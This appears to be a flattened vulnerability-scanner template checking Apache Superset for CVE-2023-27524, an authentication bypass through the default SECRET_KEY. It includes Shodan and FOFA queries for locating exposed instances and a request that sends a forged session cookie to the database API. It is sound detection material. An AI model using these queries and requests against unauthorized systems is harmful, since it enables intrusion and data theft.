info: name:Apache Superset - Authentication Bypass author:DhiyaneshDK,_0xf4n9x_ severity:critical description:Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config. impact:| Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to sensitive information. remediation:| Apply the latest security patches or upgrade to a patched version of Apache Superset. reference: -https://github.com/horizon3ai/CVE-2023-27524 -https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/ -https://nvd.nist.gov/vuln/detail/CVE-2023-27524 -http://packetstormsecurity.com/files/172522/Apache-Superset-2.0.0-Authentication-Bypass.html -http://www.openwall.com/lists/oss-security/2023/04/24/2 classification: cvss-metrics:CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score:9.8 cve-id:CVE-2023-27524 cwe-id:CWE-1188 epss-score:0.82895 epss-percentile:0.99195 cpe:cpe:2.3:a:apache:superset:*:*:*:*:*:*:*:* metadata: verified:true max-request:46 vendor:apache product:superset shodan-query: -html:"Apache Superset" -http.favicon.hash:1582430156 -http.html:"apache superset" fofa-query: -body="apache superset" -icon_hash=1582430156 tags:packetstorm,cve,cve2023,apache,superset,auth-bypass,kev
flow:http(1) && http(2)
http: -raw: -| GET / HTTP/1.1 Host:{{Hostname}}
matchers: -type: word words: -"Apache Superset" -"superset" condition:or internal:true
-raw: -raw: -| GET /api/v1/database/{{path}} HTTP/1.1 Host:{{Hostname}} Cookie:session={{session}}